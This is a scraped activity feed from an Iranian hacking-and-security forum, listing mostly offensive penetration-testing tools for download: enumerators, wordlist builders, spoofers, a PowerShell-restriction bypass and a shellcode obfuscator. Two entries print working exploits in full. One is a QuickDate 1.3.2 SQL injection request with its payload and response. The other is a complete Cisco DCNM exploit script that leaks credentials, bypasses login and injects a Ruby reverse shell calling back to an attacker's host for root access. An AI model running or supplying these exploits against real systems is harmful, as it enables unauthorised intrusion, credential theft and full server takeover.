رفتن به مطلب

انجمن هک و امنیت گروه امنیتی ایران - Iran Security Group

قوانین و شرایط استفاده از سایت ISG

تمامی فعالیت ها

این جریان به طور خودکار بروزرسانی می شود     

  1. هفته گذشته
  2. Root SmasheЯ

    Syborg-Recursive DNS Domain Enumerator

    Syborg is a Recursive DNS Domain Enumerator which is neither active nor completely passive. This tool simply constructs a domain name and queries it with a specified DNS Server. Syborg has a Dead-end Avoidance system inspired from @Tomnomnom's ettu. When you run subdomain enumeration with some of the tools, most of them passively query public records like virustotal, crtsh or censys. This enumeration technique is really fast and helps to find out a lot of domains in much less time. However, there are some domains that may not be mentioned in these public records. In order to find those domains, Syborg interacts with the nameservers and recursively brute-forces subdomain from the DNS until it's queue is empty. Installation: Resolve the Dependencies: pip3 install -r requirements.txt Usage: python3 syborg.py yahoo.com Download Cyborg
  3. Root SmasheЯ

    Weblogic Scanner

    Currently detectable vulnerabilities: weblogic administrator console CVE-2014-4210 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2017-3506 CVE-2017-10271 CVE-2018-2628 CVE-2018-2893 CVE-2018-2894 CVE-2018-3191 CVE-2018-3245 CVE-2018-3252 CVE-2019-2618 CVE-2019-2725 CVE-2019-2729 CVE-2019-2890 نیازمندی ها python >= 3.6 pip3 install requests Download Weblogic scanner
  4. Root SmasheЯ

    Fuzzowski-Network Protocol Fuzzer

    The idea is to be the Network Protocol Fuzzer that we will want to use. The aim of this tool is to assist during the whole process of fuzzing a network protocol, allowing to define the communications, helping to identify the "suspects" of crashing a service, and much more. █ █ ████████ ██████████ ██ ████ ██ ██ ████ ██ ████ ████ █ ████████████ █ █ ██████████ █ Fuzzowski Network Fuzzer █ █ █ █ 🄯 Fuzzers, inc. ██ ██ by Mario Rivas Features Based on Sulley Fuzzer for data generation [[Hidden Content]] Actually, forked BooFuzz (which is a fork of Sulley) [[Hidden Content] ] Python3 Not random (finite number of possibilities) Requires to “create the packets” with types (spike fuzzer style) Also allows to create ""Raw"" packets from parameters, with injection points (quite useful for fuzzing simple protocols) Has a nice console to pause, review and retest any suspect (prompt_toolkit ftw) Allows to skip parameters that cause errors, automatically or with the console Nice print formats for suspect packets (to know exactly what was fuzzed) It saves PoCs as python scripts for you when you mark a test case as a crash Monitor modules to gather information of the target, detecting odd behaviours and marking suspects Restarter modules that will restart the target if the connection is lost (e.g. powering off and on an smart plug) Protocols implemented LPD (Line Printing Daemon): Fully implemented IPP (Internet Printing Protocol): Partially implemented BACnet (Building Automation and Control networks Protocol): Partially implemented Modbus (ICS communication protocol): Partially implemented Download Fuzzowski-Network Protocol Fuzzer
  5. Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper. Download Windows version [Hidden Content] Download Linux version [Hidden Content] [Hidden Content] Download Mac version [Hidden Content]
  6. جدیدا
  7. بر روی سیستم های ویندوزی، نرم افزارهای امنیتی دسترسی به Powershell را محدود می کنند. با استفاده از این ابزار می توان Powershell را تنها با dll ها اجرا کرد. Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe or as a standalone executable. Download PowerShdll
  8. Root SmasheЯ

    TugaRecon-Fast subdomains enumeration

    tugarecon is a python tool designed to enumerate subdomains using modules. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Bruteforce was integrated was a module to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. TugaRecon, tribute to Portuguese explorers reminding glorious past of this country Download TugaRecon
  9. Root SmasheЯ

    PyDictor v2019 - Hacker dictionary builder

    pydictor —— A powerful and useful hacker dictionary builder for a brute-force attack Q: Why I need to use pydictor ? A: 1.it always can help you You can use pydictor to generate a general blast wordlist, a custom wordlist based on Web content, a social engineering wordlist, and so on; You can use the pydictor built-in tool to safe delete, merge, unique, merge and unique, count word frequency to filter the wordlist, besides, you also can specify your wordlist and use '-tool handler' to filter your wordlist; 2.highly customized You can generate highly customized and complex wordlist by modify multiple configuration files, add your own dictionary, using leet mode, filter by length、char occur times、types of different char、regex, even add customized encode scripts in /lib/encode/ folder, add your own plugin script in /plugins/ folder, add your own tool script in /tools/ folder. 3.powerful and flexible configuration file parsing nothing to say,skilled use and you will love it 4.great compatibility whether you are using Python 2.7 version or Python 3.x version , pydictor can be run on Windows, Linux or Mac; Download v2019
  10. Root SmasheЯ

    Full Mobile Hacking CheatSheet - Android/iOS

    iOS
  11. Root SmasheЯ

    Full Mobile Hacking CheatSheet - Android/iOS

    The Mobile Hacking CheatSheet is an attempt to summarise a few interesting basics info regarding tools and commands needed to assess the security of Android and iOS mobile applications. Android
  12. Detective

    QuickDate 1.3.2 - SQL Injection

    # Exploit Title: QuickDate 1.3.2 - SQL Injection # Dork: N/A # Date: 2020-02-07 # Exploit Author: Ihsan Sencan # Vendor Homepage: [Hidden Content] # Version: 1.3.2 # Tested on: Linux # CVE: N/A # POC: # 1) # POST /find_matches HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 425 Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 _located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- - # # HTTP/1.1 200 OK Date: Thu, 06 Feb 2020 15:05:34 GMT Server: Apache Connection: Keep-alive, close Access-Control-Allow-Origin: * Access-Control-Max-Age: 3600 Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent Content-Type: application/json; charset=UTF-8 Content-Length: 3844 {"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike [email protected] : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1} #
  13. #!/usr/bin/python """ Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers - Release: 11.2(1) - Release Date: 05-Jun-2019 - FileName: dcnm-va.11.2.1.iso.zip - Size: 4473.54 MB (4690850167 bytes) - MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb Bug 1: CVE-2019-15977 / ZDI-20-012 Bug 2: CVE-2019-15977 / ZDI-20-013 Bug 3: CVE-2019-15978 / ZDI-20-102 Example: ======== saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <connectback:port> (+) eg: ./poc.py 192.168.100.123 192.168.100.59 (+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337 saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337 (+) leaked user: root (+) leaked pass: Dcnmpass123 (+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012 (+) created a root session! (+) starting handler on port 1337 (+) connection from 192.168.100.123 (+) pop thy shell! id uid=0(root) gid=0(root) groups=0(root) uname -a Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux """ import re import sys import random import socket import string import requests import telnetlib from threading import Thread from Crypto.Cipher import Blowfish from requests.auth import HTTPBasicAuth from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def handler(lp): print "(+) starting handler on port %d" % lp t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" % addr[0] t.sock = conn print "(+) pop thy shell!" t.interact() def exec_code(t, lp, s): handlerthr = Thread(target=handler, args=(lp,)) handlerthr.start() c = { "JSESSIONID" : sessionid } r = requests.get("[Hidden Content]" % (t, s), cookies=c, verify=False) def random_string(string_length = 8): """ generate a random string of fixed length """ letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(string_length)) def decrypt(key): """ decrypt the leaked password """ cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB) msg = cipher.decrypt(key.decode("hex")) return msg def we_can_leak(target): """ used to bypass auth """ global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass dbuser = None dbpass = None vfspth = None rootuser = None rootpass = None jdbc = None uri = '[Hidden Content]' % target c = HTTPBasicAuth('admin', 'nbv_12345') r = requests.get(uri, verify=False, auth=c) leaked = r.text match = re.search("db.password = #(.*)", leaked) if match: dbpass = match.group(1) match = re.search("db.user = (.*)", leaked) if match: dbuser = match.group(1) match = re.search("dcnmweb = (.*)", leaked) if match: vfspth = match.group(1) match = re.search("db.url = (.*)", leaked) if match: jdbc = match.group(1) match = re.search("server.sftp.password = #(.*)", leaked) if match: rootpass = match.group(1) match = re.search("server.sftp.username = (.*)", leaked) if match: rootuser = match.group(1) if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass: return True return False def we_can_login(target, password): """ we have bypassed auth at this point by leaking the creds """ global sessionid, resttoken d = { "j_username" : rootuser, "j_password" : password, } uri = "[Hidden Content]" % target r = requests.post(uri, data=d, verify=False, allow_redirects=False) if "Set-Cookie" in r.headers: match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"]) if match: sessionid = match.group(1) resttoken = match.group(2) return True return False def pop_a_root_shell(t, ls, lp): """ get dat shell! """ handlerthr = Thread(target=handler, args=(lp,)) handlerthr.start() uri = "[Hidden Content]" % t cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp) cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\"" j = { "name" : cmdi, # this is needed to pass validate() on line 149 of the LanFabricImpl class "generalSetting" : { "asn" : "1337", "provisionOption" : "Manual" }, "provisionSetting" : { "dhcpSetting": { "primarySubnet" : "127.0.0.1", "primaryDNS" : "127.0.0.1", "secondaryDNS" : "127.0.0.1" }, "ldapSetting" : { "server" : "127.0.0.1" }, "amqpSetting" : { "server" : "127.0.0.1:1337" } } } c = { "resttoken": resttoken } r = requests.post(uri, json=j, cookies=c, verify=False) if r.status_code == 200 and ls in r.text: return True return False def main(): if len(sys.argv) != 3: print "(+) usage: %s <target> <connectback:port>" % sys.argv[0] print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0] print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0] sys.exit(1) t = sys.argv[1] cb = sys.argv[2] if not ":" in cb: print "(+) using default connectback port 4444" ls = cb lp = 4444 else: if not cb.split(":")[1].isdigit(): print "(-) %s is not a port number!" % cb.split(":")[1] sys.exit(-1) ls = cb.split(":")[0] lp = int(cb.split(":")[1]) # stage 1 - leak the creds if we_can_leak(t): pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass)) print "(+) leaked user: %s" % rootuser print "(+) leaked pass: %s" % pwd print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:]) # stage 2 - get a valid sesson if we_can_login(t, pwd): print "(+) created a root session!" # stage 3 - get a root shell via cmdi pop_a_root_shell(t, ls, lp) if __name__ == "__main__": main()
  14. Automatically brute force all services running on a target Open ports Usernames Passwords Demo Video: Download BruteX v2.1
  15. The code for iHateregex.io - a regex cheatsheet for the haters Features Visual representation of regular expressions Matched strings - the Testing area Embed regular expression visualization on your sites Regex code highlighting and validation Regex description with markdown support Demo: [Hidden Content] [Hidden Content]
  16. A tool for automating cracking methodologies through Hashcat. Download Hate Crack
  17. The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. It has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, it is the standard for social-engineering penetration tests and supported heavily within the security community. Download v8.0.2
  18. Root SmasheЯ

    Damn Small SQLi Scanner

    Damn Small SQLi Scanner (DSSS) is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. As of optional settings it supports HTTP proxy together with HTTP header values User-Agent, Referer and Cookie. DSSS-Nov 12, 2019.zip
  19. Root SmasheЯ

    Snowflake v1.0.3

    Snowflake is a graphical SSH client. It has a file browser, terminal emulator, resource/process manager, disk space analyzer, text editor, log viewer and lots of other helpful tools, which makes it easy to work with remote servers. It runs on Linux and Windows. Snowflake has been tested with Ubuntu server, CentOS, RHEL, OpenSUSE, FreeBSD, OpenBSD, NetBSD and HP-UX. Intended audience The application is targeted mainly towards web/backend developers who often deploy/debug their code on remote servers and not overly fond of complex terminal based commands. It could also be useful for sysadmins as well who manages lots of remote servers manually. Download for Windows | Ubuntu/Mint/Debian | Other Linux | Other (Java11)
  20. Root SmasheЯ

    Chain Reactor

    Chain Reactor is an open source framework for composing executables that can simulate adversary behaviors and techniques on Linux endpoints. Executables can perform sequences of actions like process creation, network connections and more, through the simple configuration of a JSON file. Download
  21. Root SmasheЯ

    PythonAESObfuscate

    Obfuscates a Python Script and the accompanying Shellcode. Pythonic way to load shellcode. Builds an EXE for you too! Usage Place a payload.bin raw shellcode file in the same directory. Default Architecture is x86 run python obfuscate.py Default output is out.py Requirements Windows Python 2.7 Pyinstaller PyCrypto (PyCryptodome didn't seem to work) PythonAESObfuscate-vDec-30, 2019.zip
  22. Root SmasheЯ

    nullinux v4.1

    Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted. Nullinux acts as a wrapper around the Samba tools smbclient & rpcclient to enumerate hosts using a variety of techniques. Key Features: Single or multi-host enumeration Enumerate shares and list files in root directory Enumerate users & groups Multi-threaded RID Cycling Creates a formatted nullinux_users.txt output file free of duplicates for further exploitation Python 2.7 & 3 compatible Download nullinux v4.1
  23. Root SmasheЯ

    لیست کامل تمام پورت ها

    لیست کامل Port ها همراه با نام سرویس اجرا شده بر روی آن، مطابق با آخرین تغییرات RFC پذیرفته شده Download CSV Download TXT View as XML View as HTML
  24. Root SmasheЯ

    Mimir - Smart OSINT collection of common IOC types

    Overview This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes. The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added “wisdom” by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious. Base Collection For network based IOCs, Mimir gathers basic information including: Whois ASN Geolocation Reverse DNS Passive DNS Collection Sources Some of these sources will require an API key, and occassionally only by getting a paid account. I’ve tried to limit reliance on paid services as much as possible. PassiveTotal VirusTotal DomainTools OPSWAT Google SafeBrowsing Shodan PulseDive CSIRTG URLscan HpHosts Blacklist checks Spam blacklist checks Risk Scoring The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result. Machine Learning Predictions The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py. Output Mimir offers results output in various options including local file reports or exporting the results to an external service. stdout (console output) normalizes result data, printed with headers and subheaders per module JSON file beautified output to local file Excel uses multiple sheets per IOC type MISP commit new indicators ThreatConnect commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting) Download Mimir
  25. Root SmasheЯ

    InveighZero

    InveighZero is a C# LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh. Privileged Mode Features (elevated admin required) SMB capture - packet sniffer based LLMNR spoofer - packet sniffer based NBNS spoofer - packet sniffer based mDNS spoofer - packet sniffer based DNS spoofer - packet sniffer based Pcap output - TCP and UDP packets Packet sniffer console output - SYN packets, SMB kerberos negotiation, etc Unprivileged Mode Features LLMNR spoofer - UDP listener based NBNS spoofer - UDP listener based mDNS spoofer - UDP listener based DNS spoofer - UDP listener based Note: The NBNS spoofer should work on all systems even with NBNS enabled. The LLMNR and mDNS spoofers seem to work on Windows 10 and Server 2016 with those services already enabled. Firewalls can still get in the way of everything. Other Features HTTP capture - TCP listener based Proxy auth capture - TCP listener based Notable Missing Features ADIDNS attacks HTTP to SMB Relay HTTPS listener Kerberos kirbi output Notable Differences Capture and log data can be imported from previous output files. The PowerShell version stores data in a global variable that persists within the PowerShell instance. InveighZero does not execute in the background. Instead, a console is accessible while InveighZero is running. The console has commands that have similar functionality to Inveigh's Get-Inveigh, Watch-Inveigh, and Stop-Inveigh support functions. Minimum .NET Version 3.5 Download InveighZero
  26. Root SmasheЯ

    Inveigh v1.5

    Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS/DNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process. Download v1.5
  27. Root SmasheЯ

    Bopscrk

    A tool to generate smart and powerful wordlists Bopscrk (Before Outset PaSsword CRacKing) is a tool to assist in all the previous process of password cracking. By now, it's able to generate smart and powerful wordlists. The first idea was inspired by Cupp and Crunch. We could say that bopscrk is a wordlist generator situated between them, taking the best of each one. The challenge was try to apply the Cupp's idea to more generic-situations and amplify the shoot-range of the resultant wordlist, without loosing this custom-wordlist-profiler feature. bopscrk.zip
  1. نمایش فعالیت های بیشتر
×
×
  • اضافه کردن...